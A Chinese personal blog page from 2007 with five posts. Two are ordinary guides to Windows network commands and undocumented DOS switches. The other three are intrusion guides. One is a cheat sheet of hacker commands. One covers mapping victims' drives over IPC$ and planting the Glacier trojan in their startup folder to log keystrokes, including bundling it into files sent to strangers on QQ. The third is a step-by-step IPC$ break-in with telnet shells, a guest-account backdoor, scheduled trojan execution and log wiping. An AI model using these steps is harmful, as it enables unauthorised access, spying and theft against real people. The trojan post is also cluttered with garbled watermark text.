欢迎来到我的空间!请大家多多支持我!

发布新日志

  • 网络命令

    2007-09-16 17:30:08

    引: 如果你玩过路由器的话,就知道路由器里面那些很好玩的命令缩写。   例如,"sh int" 的意思是 "show interface"。   现在 Windows 2000 也有了类似界面的工具,叫做 netsh。

      我们在 Windows 2000 的 cmd shell 下,输入 netsh就出来:netsh> 提示符,

      输入 int ip 就显示:interface ip>

      然后输入 dump ,我们就可以看到当前系统的网络配置:

      # ----------------------------------

      # Interface IP Configuration

      # ----------------------------------

      pushd interface ip

      # Interface IP Configuration for "Local Area Connection"

      set address name = "Local Area Connection" source = static addr = 192.168.1.168

      mask = 255.255.255.0

      add address name = "Local Area Connection" addr = 192.1.1.111 mask = 255.255.255.0

      set address name = "Local Area Connection" gateway = 192.168.1.100 gwmetric = 1

      set dns name = "Local Area Connection" source = static addr = 202.96.209.5

      set wins name = "Local Area Connection" source = static addr = none

      popd

      # End of interface IP configuration

      上面介绍的是通过交互方式操作的一种办法。

      我们可以直接输入命令:

      "netsh interface ip add address "Local Area Connection" 10.0.0.2 255.0.0.0"

      来添加 IP 地址。

      如果不知道语法,不要紧的哦!

      在提示符下,输入 ? 就可以找到答案了。方便不方便啊?

      原来微软的东西里面,也有那么一些让人喜欢的玩意儿。可惜,之至者甚少啊!

      Windows网络命令行程序

      这部分包括:

      使用 ipconfig /all 查看配置

      使用 ipconfig /renew 刷新配置

      使用 ipconfig 管理 DNS 和 DHCP 类别 ID

      使用 Ping 测试连接

      使用 Arp 解决硬件地址问题

      使用 nbtstat 解决 NetBIOS 名称问题

      使用 netstat 显示连接统计

      使用 tracert 跟踪网络连接

      使用 pathping 测试路由器

      使用 ipconfig /all 查看配置

      发现和解决 TCP/IP 网络问题时,先检查出现问题的计算机上的 TCP/IP 配置。可以使用 ipconfig 命令获得主机配置信息,包括 IP 地址、子网掩码和默认网关。

      注意

      对于 Windows 95 和 Windows 98 的客户机,请使用 winipcfg 命令而不是 ipconfig 命令。

      使用带 /all 选项的 ipconfig 命令时,将给出所有接口的详细配置报告,包括任何已配置的串行端口。  使用 ipconfig /all,可以将命令输出重定向到某个文件,并将输出粘贴到其他文档中。也可以用该输出确认网络上每台计算机的 TCP/IP 配置,或者进一步调查 TCP/IP 网络问题。

      例如,如果计算机配置的 IP 地址与现有的 IP 地址重复,则子网掩码显示为 0.0.0.0。

      下面的范例是 ipconfig /all 命令输出,该计算机配置成使用 DHCP 服务器动态配置TCP/IP,并使用WINS 和 DNS 服务器解析名称。

      Windows 2000 IP Configuration

      Node Type.. . . . . . . . : Hybrid

      IP Routing Enabled.. . . . : No

      WINS Proxy Enabled.. . . . : No

      Ethernet adapter Local Area Connection:

      Host Name.. . . . . . . . : corp1.microsoft.com

      DNS Servers . . . . . . . : 10.1.0.200

      Descrīption. . . . . . . : 3Com 3C90x Ethernet Adapter

      Physical Address. . . . . : 00-60-08-3E-46-07

      DHCP Enabled.. . . . . . . : Yes

      Autoconfiguration Enabled.: Yes

      IP Address. . . . . . . . . : 192.168.0.112

      Subnet Mask. . . . . . . . : 255.255.0.0

      Default Gateway. . . . . . : 192.168.0.1

      DHCP Server. . . . . . . . : 10.1.0.50

      Primary WINS Server. . . . : 10.1.0.101

      Secondary WINS Server. . . : 10.1.0.102

      Lease Obtained.. . . . . . : Wednesday, September 02, 1998 10:32:13 AM

      Lease Expires.. . . . . . : Friday, September 18, 1998 10:32:13 AM

      如果 TCP/IP 配置没有问题,下一步测试能够连接到 TCP/IP 网络上的其他主机。

      使用 ipconfig /renew 刷新配置

      解决 TCP/IP 网络问题时,先检查遇到问题的计算机上的 TCP/IP 配置。如果计算机启用 DHCP 并使用 DHCP 服务器获得配置,请使用 ipconfig /renew 命令开始刷新租约。

      使用 ipconfig /renew 时,使用 DHCP 的计算机上的所有网卡(除了那些手动配置的适配器)都尽量连接到DHCP 服务器,更新现有配置或者获得新配置。

      也可以使用带 /release 选项的 ipconfig 命令立即释放主机的当前 DHCP 配置。有关 DHCP 和租用过程的详细信息,请参阅客户机如何获得配置。

      注意

      对于启用 DHCP 的 Windows 95 和 Windows 98 客户,请使用 winipcfg 命令的 release 和 renew 选项,而不是 ipconfig /release 和 ipconfig /renew 命令,手动释放或更新客户的 IP 配置租约。

      使用 ipconfig 管理 DNS 和 DHCP 类别 ID

      也可以使用 ipconfig 命令:

      显示或重置 DNS 缓存。

      详细信息,请参阅使用 ipconfig 查看或重置客户解析程序缓存。

      刷新已注册的 DNS 名称。

      详细信息,请参阅使用 ipconfig 更新 DNS 客户注册。

      显示适配器的 DHCP 类别 ID。

      详细信息,请参阅显示客户机上的 DHCP 类别 ID 信息。

      设置适配器的 DHCP 类别 ID。

      详细信息,请参阅设置客户机上的 DHCP 类别 ID 信息。

      使用 Ping 测试连接

      Ping 命令有助于验证 IP 级的连通性。发现和解决问题时,可以使用 Ping 向目标主机名或 IP 地址发送 ICMP 回应请求。需要验证主机能否连接到 TCP/IP 网络和网络资源时,请使用 Ping。也可以使用 Ping 隔离网络硬件问题和不兼容配置。

      通常最好先用 Ping 命令验证本地计算机和网络主机之间的路由是否存在,以及要连接的网络主机的 IP 地址。Ping 目标主机的IP 地址看它是否响应,如下:

      ping IP_address

      使用 Ping 时应该执行以下步骤:

      Ping 环回地址验证是否在本地计算机上安装 TCP/IP 以及配置是否正确。

      ping 127.0.0.1

      Ping 本地计算机的 IP 地址验证是否正确地添加到网络。

      ping IP_address_of_local_host

      Ping 默认网关的 IP 地址验证默认网关是否运行以及能否与本地网络上的本地主机通讯。

      ping IP_address_of_default_gateway

      Ping 远程主机的 IP 地址验证能否通过路由器通讯。

      ping IP_address_of_remote_host

      Ping 命令用 Windows 套接字样式的名称解析将计算机名解析成 IP 地址,所以如果用地址成功,但是用名称 Ping 失败,则问题出在地址或名称解析上,而不是网络连通性的问题。详细信息,请参阅使用 Arp 解决硬件地址问题。

      如果在任何点上都无法成功地使用 Ping,请确认:

      安装和配置 TCP/IP 之后重新启动计算机。

      “Internet 协议 (TCP/IP) 属性”对话框“常规”选项卡上的本地计算机的 IP 地址有效而且正确。

      启用 IP 路由,并且路由器之间的链路是可用的。

      您可以使用 Ping 命令的不同选项来指定要使用的数据包大小、要发送多少数据包、是否记录用过的路由、要使用的生存时间 (TTL) 值以及是否设置“不分段”标志。可以键入 ping -? 查看这些选项。

      下例说明如何向 IP 地址 172.16.48.10 发送两个 Ping,每个都是 1,450 字节:

      C:\>ping -n 2 -l 1450 172.16.48.10

      Pinging 172.16.48.10 with 1450 bytes of data:

      Reply from 172.16.48.10:bytes=1450 time<10ms TTL=32

      Reply from 172.16.48.10:bytes=1450 time<10ms TTL=32

      Ping statistics for 157.59.8.1:

      Packets:Sent = 2, Received = 2, Lost = 0 (0% loss),

      Approximate roundtrip times in milli-seconds:

      Minimum = 0ms, Maximum = 10ms, Average = 2ms

      默认情况下,在显示“请求超时”之前,Ping 等待 1,000 毫秒(1 秒)的时间让每个响应返回。如果通过 Ping 探测的远程系统经过长时间延迟的链路,如卫星链路,则响应可能会花更长的时间才能返回。可以使用 -w (等待)选项指定更长时间的超时。

      使用 Arp 解决硬件地址问题

      “地址解析协议 (ARP)”允许主机查找同一物理网络上的主机的媒体访问控制地址,如果给出后者的 IP 地址。为使 ARP 更加有效,每个计算机缓存 IP 到媒体访问控制地址映射消除重复的 ARP 广播请求。

      可以使用 arp 命令查看和修改本地计算机上的 ARP 表项。arp 命令对于查看 ARP 缓存和解决地址解析问题非常有用。

      详细信息,请参阅查看“地址解析协议 (ARP)”缓存和添加静态 ARP 缓存项目。

      使用 nbtstat 解决 NetBIOS 名称问题

      TCP/IP 上的 NetBIOS (NetBT) 将 NetBIOS 名称解析成 IP 地址。TCP/IP 为 NetBIOS 名称解析提供了很多选项,包括本地缓存搜索、WINS 服务器查询、广播、DNS 服务器查询以及 Lmhosts 和主机文件搜索。

      Nbtstat 是解决 NetBIOS 名称解析问题的有用工具。可以使用nbtstat 命令删除或更正预加载的项目:

      nbtstat -n 显示由服务器或重定向器之类的程序在系统上本地注册的名称。

      nbtstat -c 显示 NetBIOS 名称缓存,包含其他计算机的名称对地址映射。

      nbtstat -R 清除名称缓存,然后从 Lmhosts 文件重新加载。

      nbtstat -RR 释放在 WINS 服务器上注册的 NetBIOS 名称,然后刷新它们的注册。

      nbtstat -a name 对 name 指定的计算机执行 NetBIOS 适配器状态命令。适配器状态命令将返回计算机的本地 NetBIOS 名称表,以及适配器的媒体访问控制地址。

      nbtstat -S 列出当前的 NetBIOS 会话及其状态(包括统计),如下例所示:

      NetBIOS connection table

      Local name State In/out Remote Host Input Output

      ------------------------------------------------------------------

      CORP1 <00> Connected Out CORPSUP1<20> 6MB 5MB

      CORP1 <00> Connected Out CORPPRINT<20> 108KB 116KB

      CORP1 <00> Connected Out CORPSRC1<20> 299KB 19KB

      CORP1 <00> Connected Out CORPEMAIL1<20> 324KB 19KB

      CORP1 <03> Listening

      使用 netstat 显示连接统计

      可以使用 netstat 命令显示协议统计信息和当前的 TCP/IP 连接。netstat -a 命令将显示所有连接,而 netstat -r 显示路由表和活动连接。netstat -e 命令将显示Ethernet 统计信息,而 netstat -s 显示每个协议的统计信息。如果使用 netstat -n,则不能将地址和端口号转换成名称。下面是 netstat 的输出示例:

      C:\>netstat -e

      Interface Statistics

      Received Sent

      Bytes 3995837940 47224622

      Unicast packets 120099 131015

      Non-unicast packets 7579544 3823

      Discards 0 0

      Errors 0 0

      Unknown protocols 363054211

      C:\>netstat -a

      Active Connections

      Proto Local Address Foreign Address State

      TCP CORP1:1572 172.16.48.10:nbsession ESTABLISHED

      TCP CORP1:1589 172.16.48.10:nbsession ESTABLISHED

      TCP CORP1:1606 172.16.105.245:nbsession ESTABLISHED

      TCP CORP1:1632 172.16.48.213:nbsession ESTABLISHED

      TCP CORP1:1659 172.16.48.169:nbsession ESTABLISHED

      TCP CORP1:1714 172.16.48.203:nbsession ESTABLISHED

      TCP CORP1:1719 172.16.48.36:nbsession ESTABLISHED

      TCP CORP1:1241 172.16.48.101:nbsession ESTABLISHED

      UDP CORP1:1025 *:*

      UDP CORP1:snmp *:*

      UDP CORP1:nbname *:*

      UDP CORP1:nbdatagram *:*

      UDP CORP1:nbname *:*

      UDP CORP1:nbdatagram *:*

      C:\>netstat -s

      IP Statistics

      Packets Received = 5378528

      Received Header Errors = 738854

      Received Address Errors = 23150

      Datagrams Forwarded = 0

      Unknown Protocols Received = 0

      Received Packets Discarded = 0

      Received Packets Delivered = 4616524

      Output Requests = 132702

      Routing Discards = 157

      Discarded Output Packets = 0

      Output Packet No Route = 0

      Reassembly Required = 0

      Reassembly Successful = 0

      Reassembly Failures =

      Datagrams Successfully Fragmented = 0

      Datagrams Failing Fragmentation = 0

      Fragments Created = 0

      ICMP Statistics

      Received Sent

      Messages 693 4

      Errors 0 0

      Destination Unreachable 685 0

      Time Exceeded 0 0

      Parameter Problems 0 0

      Source Quenches 0 0

      Redirects 0 0

      Echoes 4 0

      Echo Replies 0 4

      Timestamps 0 0

      Timestamp Replies 0 0

      Address Masks 0 0

      Address Mask Replies 0 0

      TCP Statistics

      Active ōpens = 597

      Passive ōpens = 135

      Failed Connection Attempts = 107

      Reset Connections = 91

      Current Connections = 8

      Segments Received = 106770

      Segments Sent = 118431

      Segments Retransmitted = 461

      UDP Statistics

      Datagrams Received = 4157136

      No Ports = 351928

      Receive Errors = 2

      Datagrams Sent = 13809

      使用 tracert 跟踪网络连接

      Tracert(跟踪路由)是路由跟踪实用程序,用于确定 IP 数据报访问目标所采取的路径。Tracert 命令用 IP 生存时间 (TTL) 字段和 ICMP 错误消息来确定从一个主机到网络上其他主机的路由。

      Tracert 工作原理

      通过向目标发送不同 IP 生存时间 (TTL) 值的“Internet 控制消息协议 (ICMP)”回应数据包,    Tracert 诊断程序确定到目标所采取的路由。要求路径上的每个路由器在转发数据包之前至少将数据包上的 TTL 递减 1。数据包上的 TTL 减为 0 时,路由器应该将“ICMP 已超时”的消息发回源系统。

      Tracert 先发送 TTL 为 1 的回应数据包,并在随后的每次发送过程将 TTL 递增 1,直到目标响应或 TTL 达到最大值,从而确定路由。通过检查中间路由器发回的“ICMP 已超时”的消息确定路由。某些路由器不经询问直接丢弃 TTL 过期的数据包,这在Tracert 实用程序中看不到。

      Tracert 命令按顺序打印出返回“ICMP 已超时”消息的路径中的近端路由器接口列表。如果使用 -d 选项,则 Tracert 实用程序不在每个 IP 地址上查询 DNS。

      在下例中,数据包必须通过两个路由器(10.0.0.1 和 192.168.0.1)才能到达主机172.16.0.99。主机的默认网关是 10.0.0.1,192.168.0.0 网络上的路由器的 IP地址是 192.168.0.1。

      C:\>tracert 172.16.0.99 -d

      Tracing route to 172.16.0.99 over a maximum of 30 hops

      1 2s 3s 2s 10,0.0,1

      2 75 ms 83 ms 88 ms 192.168.0.1

      3 73 ms 79 ms 93 ms 172.16.0.99

      Trace complete.

      用 tracert 解决问题

      可以使用 tracert 命令确定数据包在网络上的停止位置。下例中,默认网关确定 192.168.10.99 主机没有有效路径。这可能是路由器配置的问题,或者是 192.168.10.0 网络不存在(错误的 IP 地址)。

      C:\>tracert 192.168.10.99

      Tracing route to 192.168.10.99 over a maximum of 30 hops

      1 10.0.0.1 reportsestination net unreachable.

      Trace complete.

      Tracert 实用程序对于解决大网络问题非常有用,此时可以采取几条路径到达同一个点。

      Tracert 命令行选项

      Tracert 命令支持多种选项,如下表所示。

      tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name

      选项 描述

      -d 指定不将 IP 地址解析到主机名称。

      -h maximum_hops 指定跃点数以跟踪到称为 target_name 的主机的路由。

      -j host-list 指定 Tracert 实用程序数据包所采用路径中的路由器接口列表。

      -w timeout 等待 timeout 为每次回复所指定的毫秒数。

      target_name 目标主机的名称或 IP地址。

      详细信息,请参阅使用 tracert 命令跟踪路径。

      使用 pathping 测试路由器

      pathping 命令是一个路由跟踪工具,它将 ping 和 tracert 命令的功能和这两个工具所不提供的其他信息结合起来。pathping 命令在一段时间内将数据包发送到到达最终目标的路径上的每个路由器,然后基于数据包的计算机结果从每个跃点返回。由于命令显示数据包在任何给定路由器或链接上丢失的程度,因此可以很容易地确定可能导致网络问题的路由器或链接。某些选项是可用的,如下表所示。

      选项 名称 功能

      -n Hostnames 不将地址解析成主机名。

      -h Maximum hops 搜索目标的最大跃点数。

      -g Host-list 沿着路由列表释放源路由。

      -p Period 在 ping 之间等待的毫秒数。

      -q Num_queries 每个跃点的查询数。

      -w Time-out 为每次回复所等待的毫秒数。

      -T Layer 2 tag 将第 2 层优先级标记(例如,对于 IEEE 802.1p)连接到数据包并将它发送到路径中的每个网络设备。这有助于标识没有正确配置第 2 层优先级的网络设备。-T 开关用于测试服务质量 (QoS) 连通性。

      -R RSVP isbase Che检查以确定路径中的每个路由器是否支持“资源保留协议 (RSVP)”,此协议允许主机为数据流保留一定量的带宽。 -R 开关用于测试服务质量 (QoS) 连通性。

      默认的跃点数是 30,并且超时前的默认等待时间是 3 秒。默认时间是 250 毫秒,并且沿着路径对每个路由器进行查询的次数是 100。

      以下是典型的 pathping 报告。跃点列表后所编辑的统计信息表明在每个独立路由器上数据包丢失的情况。

      D:\>pathping -n msw

      Tracing route to msw [7.54.1.196]

      over a maximum of 30 hops:

      0 172.16.87.35

      1 172.16.87.218

      2 192.68.52.1

      3 192.68.80.1

      4 7.54.247.14

      5 7.54.1.196

      Computing statistics for 125 seconds...

      Source to Here This Node/Link

      Hop RTT Lost/Sent = Pct Lost/Sent = Pct Address

      0 172.16.87.35

      0/ 100 = 0% |

      1 41ms 0/ 100 = 0% 0/ 100 = 0% 172.16.87.21813/ 100 = 13% |

      2 22ms 16/ 100 = 16% 3/ 100 = 3% 192.68.52.10/ 100 = 0% |

      3 24ms 13/ 100 = 13% 0/ 100 = 0% 192.68.80.1 0/ 100 = 0% |

      4 21ms 14/ 100 = 14% 1/ 100 = 1% 10.54.247.14 0/ 100 = 0% |

      5 24ms 13/ 100 = 13% 0/ 100 = 0% 10.54.1.196

      Trace complete.

      当运行 pathping 时,在测试问题时首先查看路由的结果。此路径与 tracert 命令所显示的路径相同。然后 pathping 命令对下一个 125 毫秒显示忙消息(此时间根据跃点计数变化)。在此期间,pathping 从以前列出的所有路由器和它们之间的链接之间收集信息。在此期间结束时,它显示测试结果。

      最右边的两栏 This Node/Link Lost/Sent=Pct 和 Address 包含的信息最有用。172.16.87.218(跃点 1)和 192.68.52.1(跃点 2)丢失 13% 的数据包。 所有其他链接工作正常。在跃点 2 和 4 中的路由器也丢失寻址到它们的数据包(如 This Node /Link 栏中所示),但是该丢失不会影响转发的路径。

      对链接显示的丢失率(在最右边的栏中标记为 |)表明沿路径转发丢失的数据包。该丢失表明链接阻塞。对路由器显示的丢失率(通过最右边栏中的 IP 地址显示)表明这些路由器的 CPU 可能超负荷运行。这些阻塞的路由器可能也是端对端问题的一个因素,尤其是在软件路由器转发数据包时。

    查看(548) 评论(2) 收藏 分享 圈子 管理

  • 网络常用命令行

    2007-09-16 17:27:28

       黑客远程DOS命令行

    注意:每行一个命令,命令与说明之间请用“---”隔开,请勿删除此行!
    open---开启控制台交互
    dir
    cd\
    ping ip---向对方主机发送默认大小为32字节的数据
    ipconfig---用于查看本地ip地址
    net use \\ip\ipc$ "" /user:""---建立IPC空链接
    net use \\ip\ipc$ "密码" /user:"用户名"---建立IPC非空链接
    net use h: \\ip\c$ "密码" /user:"用户名"---登陆后映射对方C:到本地为H:
    net use \\ip\ipc$ /del---删除IPC链接
    net use h: /del---删除映射对方到本地的为H:的映射
    net user 用户名 密码 /add---建立用户
    net user guest /active:yes---激活guest用户
    net user---查看有哪些用户
    net user 帐户名---查看帐户的属性
    net localgroup administrators 用户名 /add---把“某用户”添加到管理员中
    net start---查看开启了哪些服务
    net start 服务名---开启服务;(如:net start telnet)
    net stop 服务名---停止某服务
    net time \\目标ip---查看对方时间
    net time \\目标ip /set---设置本地计算机时间与“目标IP”主机的时间同步
    net view---查看本地局域网内开启了哪些共享
    net view \\ip---查看对方局域网内开启了哪些共享
    net config---显示系统网络设置
    net logoff---断开连接的共享
    net pause 服务名---暂停某服务
    net send ip "文本信息"---向对方发信息
    net share---查看本地开启的共享
    net share ipc$---开启ipc$共享
    net share ipc$ /del---删除ipc$共享
    net share c$ /del---删除C:共享
    net user guest 12345---用guest用户登陆后用将密码改为12345
    net password 密码---更改系统登陆密码
    netstat -a---查看开启了哪些端口,常用netstat -an
    netstat -n---查看端口的网络连接情况,常用netstat -an
    netstat -v---查看正在进行的工作
    netstat -p 协议名---例:netstat -p tcq/ip 查看某协议使用情况
    netstat -s---查看正在使用的所有协议使用情况
    nbtstat -A ip---对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名
    regedit---打开注册表编辑器
    telnet---打开TELNET
    cls---清屏
    exit---关闭控制台交互

    查看(463) 评论(0) 收藏 分享 圈子 管理

  • DOS未公开的命令行参数

    2007-09-16 17:25:53

    DOS系统中有许多未公开的命令与参数。我经过收集整理,发现了很多。由于DOS的有好几种,所以下面仅以MS-DOS为例,介绍一下常用命令中的未公开的命令与参数。经过比较,我发现在MS-DOS的各版本中,7.x版中的未公开命令与参数是最多的,这些7.x版本中的未公开命令与参数在其它DOS版本中通常是没有的,但却是非常实用的,例如COMMAND /Z命令,这是用DOS自带的命令显示ERRORLEVEL(错误返回代码)值的唯一方法(当然,用其它的附加工具,如ERR2ENV等也可以做到)。

    DOS未公开命令:

    TRUENAME:用于显示实际的路径,对SUBST等命令很有用。
    INSTALLHIGH:用在CONFIG.SYS中,将文件调入UMB。
    LOGO和COMMENT:仅用在DOS7中的CONFIG.SYS中,用法未知。

    DOS未公开参数:

    COMMAND /F 使Fail作为Abort,Retry,Fail中的默认选项。
    COMMAND /D 在DOS5中是禁止AUTOEXEC.BAT自动执行;在6.0+版本中是禁止/F参数。
    COMMAND /Z 显示ERRORLEVEL(错误返回代码)信息。
    COMMAND /T 在DOS7.x中强制将COMMAND.COM永久性调入常规内存。

    FORMAT /AUTOTEST 自动完成格式化过程。
    FORMAT /BACKUP 自动完成格式化过程,并提示输入卷标。
    FORMAT /SELECT 只在磁盘上备份系统区数据,相当于MIRROR程序。
    FORMAT /SELECT /U 将引导区和文件分配表用F6H填之。
    FORMAT /Z:n 设置FAT32分区上的簇大小。

    FDISK /MBR 重写硬盘主引导记录。
    FDISK /CMBR drive 重写指定驱动器上的主引导记录。
    FDISK /PRI:size 创建主分区。
    FDISK /EXT:size 创建扩展分区。
    FDISK /LOG:size 在扩展分区上创建逻辑驱动器。
    FDISK /PRMT|/Q 提示行动/安静模式。
    FDISK /PARTN 将分区表信息保存到PARTSAV.FIL中。
    FDISK /ACTOK 用于DOS7中,跳过完整性测试。
    FDISK /FPRMT 用于DOS7中,自动采用FAT32,并跳过提示信息。

    DOSKEY /APPEDIT 使DOSKEY也应用于其它程序(如DEBUG等)中。
    DOSKEY /COMMAND和/PERMANENT和/SCRSIZE和/XHISTORY 用法未知。

    SCANDISK /CLIP 用于DOS7中,将长文件名剪为短文件名。
    SCANDISK /NOLOST 用于DOS7中,不提示表面测试或丢失簇。
    SCANDISK /NOUI和/TEXT 用于DOS7中,使用标准的DOS界面。
    SCANDISK /MOUNT 相当于SCANDISK.INI中的Mount=Always。
    SCANDISK /TIME 相当于SCANDISK.INI中的ScanTimeOut=On。

    QBASIC /QHELP 进入DOS6的全屏幕帮助系统,相当于执行HELP命令。
    QBASIC /EDCOM 进入DOS6的文件编辑器,相当于执行EDIT命令。

    MEM /A或MEM /ALL 显示HMA信息。

    VER /R 显示扩展的版本信息。

    DIR /Z 用于DOS7中,表示不显示长文件名。

    DOS=SINGLE 用在DOS7中的CONFIG.SYS中,启动单一模式的DOS。

    DEVICE=HIMEM.SYS /Q 当HIMEM.SYS加载时使用安静模式。

    DEVICE=EMM386.EXE NOTR 不要检测Token Ring网络适配器。

    DOS未公开用法:

    IF EXIST XMMXXXX0 ... 此命令可以判断当前是否安装了HIMEM.SYS驱动程序。
    IF EXIST EMMXXXX0 ... 此命令则用来判断当前是否安装了EMM386驱动程序。

    DIR , 用在DOS7以前的版中中,显示所有文件,相当于DIR /A。

    :: 此符号可在批处理文件中代替REM注解命令,可以加快运行速度。

    以上是MS-DOS中的未公开命令与参数,其中有些是非常实用的,大家不妨一试。

    查看(457) 评论(0) 收藏 分享 圈子 管理

  • PING的用法

    2007-09-16 17:23:01

    以前在电脑公司里工作,每天对着电脑,就想找点事情来做.结果我利用电脑入侵了别人的电脑,我越来越感兴趣,所以我就学了一点点入侵的知识.现在写出来让大家分享一下.
    &drw7[(t9L]I*l5586757★黑基空间★%{~R&z(N.c'V$c2E
        先装个防火墙,天网很好用的.因为当局域网有人PING你的时候,天网会自动报警,当然别的防火墙也会.但我一直都是用天网.例如天网记录一个192.168.123.112的IP在PING你的时候,你就在运行里输入cmd确定.在DOS下你输入ping 192.168.123.112.如果你ping的通对方的IP地址,那就证明这个IP在局域网里存在,而且可能没有装防火墙.★黑基空间★~(id6k$@/]*J@
    ★黑基空间★%p dCi(fIAv ER
         接下来在DOS下输入net use \\192.168.123.112\IPC$ ""/user:"administrator"这是利用IPC$连接对方的电脑.因为2000和XP都有隐藏共享,我也是利用隐藏共享连接他的电脑.如果DOS提示:命令成功.那就下一步
    x!^ z$j0i5RO T;am5586757★黑基空间★1I`x)jk(b_
        继续输入net user M: \\192.168.123.112\C$这是把对方电脑的C盘影射到你的电脑里.如果成功之后,你打开"我的电脑".就会发现你的电脑里会多出一个叫"192.168.123.112"的网络硬盘M.继续影射D$  E$  F$  G$.
    Zk[T2j5{ oJ5586757★黑基空间★[#r ~^4t\V9P
         接下来你就可以去打开那些网络硬盘了.你可以看里面的所有的东西,想拷东西就尽量拷吧,想删东西就删吧,不过玩的太过份就行了.
    eH.E TAf;_?5586757
    +v,mD,?s5586757      接下来你可以去下载一个"冰河"或是"远程控制任我行",冰河的教程我就不多说了,网上教程多的是.把被控端放到对方电脑C盘的启动项里面,这样他一开机就会自运运行冰河的被控端.★黑基空间★lL$m-P6c
    ★黑基空间★fU7Nu6u_ fK"S+J
          接下来的事情就简单多了,你只要在冰河主控端的扫描里输入起始IP192.168.123.1,结束IP192.168.123.254反正描就行了,如果有IP出现在你冰河左边的框里,冰河里有击键记录,有远程屏幕,你想盗什么?你想看他现在在做什么,都行.★黑基空间★bL8O+G$kKLYQ

    oR'd8i hUT!S5586757     不过冰河太老了,一般的杀毒软件就能杀掉他,而且你解压冰河的时候一定要关杀毒软件,要不然被控端会被杀掉.★黑基空间★i.UsV%@H Hj

    2X2T~C.ELO g5586757     好了,如果你知道做这一点了,说明你成为了一名最初级的黑客.起步开始了,路还远呢,慢慢来,不要急.
    c;`\lga%g5586757★黑基空间★Xm#gQ'SI1BM;c'q,EV
          注:如果把冰河被控端和一个正常文件捆绑,在QQ上传给你的那些陌生网友,特别是你网恋的MM,只要她打开了.被控端就会自动运行.她全然不知.你可以通过冰河远程连接她的电脑.她的IP一般就是你QQ上显示IP地址.
    f~5`'bx| p5586757

    查看(639) 评论(0) 收藏 分享 圈子 管理

  • ipc$完整入侵步骤祥解

    2007-09-16 17:19:51

    其实入侵步骤随个人爱好有所不同,我就说一下常见的吧,呵呵,献丑了!

      1 用扫描软件搜寻存在若口令的主机,比如流光,SSS,X-scan等,随你的便,然后锁定目标,如果扫到了管理员权限的口令,你可以进行下面的步骤了,假设你现在得到了administrator的密码为空

      2 此时您有两条路可以选择:要么给对方开telnet(命令行),要么给它传木马(图形界面),那我们就先走telnet这条路吧

      3上面开telnet的命令没忘吧,要用到opentelnet这个小程序

      c:\>OpenTelnet.exe \\192.168.21.* administrator "" 1 90

      如果返回如下信息

      *******************************************************

      Remote Telnet Configure, by refdom

      Email: refdom@263.net

      OpenTelnet.exe

      UsagepenTelnet.exe \\server username password NTLMAuthor telnetport

      *******************************************************

      Connecting \\192.168.21.*...Successfully!

      NOTICE!!!!!!

      The Telnet Service default setting:NTLMAuthor=2 TelnetPort=23

      Starting telnet service...

      telnet service is started successfully! telnet service is running!

      BINGLE!!!Yeah!!

      Telnet Port is 90. You can try:"telnet ip 90", to connect the server!

      Disconnecting server...Successfully!

      *说明你已经打开了一个端口90的telnet。

      4 现在我们telnet上去

      telnet 192.168.21.* 90

      如果成功,你将获得远程主机的一个shell,此时你可以像控制自己的机器一样控制你的肉鸡了,那么做点什么呢?把guest激活再加入管理组吧,就算留个后门了

      5 C:\>net user guest /active:yes

      *将Guest用户激活,也有可能人家的guest本来就试活的,你可以用net user guest看一下它的帐户启用的值是yes还是no

      6 C:\>net user guest 1234

      *将Guest的密码改为1234,或者改成你喜欢的密码

      7 C:\>net localgroup administrators guest /add

      *将Guest变为Administrator,这样,即使以后管理员更改了他的密码,我们也可以用guest登录了,不过也要提醒您,因为通过安全策略的设置,可以禁止guest等帐户的远程访问,呵呵,如果真是这样,那我们的后门也就白做了,愿上帝保佑Guest。

      8 好了,现在我们来走另一条路,给它传个木马玩玩

      9 首先,我们先建立起ipc$连接

      C:\>net use \\192.168.21.*\ipc$ "" /user:administrator

      10 既然要上传东西,就要先知道它开了什么共享

      C:\>net view \\192.168.21.*

      在 \\192.168.21.*的共享资源

      资源共享名 类型 用途 注释

      -----------------------------------------------------------

      C Disk

      D Disk

      命令成功完成。

      *好了,我们看到对方共享了C,D两个盘,我们下面就可以向任意一个盘复制文件了。再次声明,因为用net view命令无法看到默认共享,因此通过上面返回的结果,我们并不能判断对方是否开启了默认共享。

      11 C:\>copy love.exe \\192.168.21.*\c

      已复制 1 个文件

      *用这个命令你可以将木马客户端love.exe传到对方的c盘下,当然,如果能复制到系统文件夹下是最好的了,不容易被发现

      12 运行木马前,我们先看看它现在的时间

      net time \\192.168.21.*

      \\192.168.21.*的当前时间是 2003/8/22 上午 11:00

      命令成功完成

      13 现在我们用at运行它吧,不过对方一定要开了Task Scheduler服务(允许程序在指定时间运行),否则就不行了

      C:\>at \\192.168.21.* 11:02 c:\love.exe

      新加了一项作业,其作业 ID = 1

      14 剩下就是等了,等过了11:02,你就可以用控制端去连接了,如果成功你将可以用图形界面去控制远程主机了,如果连接失败,那么它可能在局域网里,也可能程序被防火墙杀了,还可能它下线了(没这么巧吧),无论哪种情况你只好放弃了

      嗯,好了,两种基本方法都讲了。如果你对上面的操作已经轻车熟路了,也可以用更高效的套路,比如用CA克隆guest,用psexec执行木马,用命令:psexec \\tergetIP -u user -p paswd cmd.exe直接获得shell等,这些都是可以得,随你的便。不过最后不要忘了把日志清理干净,可以用榕哥的elsave.exe。

      讲了ipc$的入侵,就不能不说如何防范,那么具体要怎样做呢?看下面

      1,怎样建立空连接,它有什么用?

      答:使用命令 net use \IPipc$ "" /user:"" 就可以简单地和目标建立一个空连接(需要目标开放ipc$)。

      对于NT,在默认安全设置下,借助空连接可以列举目标用户、共享,访问everyone权限的共享,访问小部分注册表等,没有什么利用价值。对2000作用就更小了。而且实现也不方便,需借助工具。

      2.为什么我连不上IPC$?

      答:1.只有nt/2000/xp及以上系统才可以建立ipc$。如果你用的是98/me是没有该功能的。

      2.确认你的命令没有打错。正确的命令是: net use \目标IPipc$ "密码" /user:"用户名"

      注意别多了或少了空格。当用户名和密码中不包含空格时两边的双引号可以省略。空密码用""表示。

      3,根据返回的错误号分析原因:

      错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;

      错误号51,Windows 无法找到网络路径 : 网络有问题;

      错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);

      错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$;

      错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。

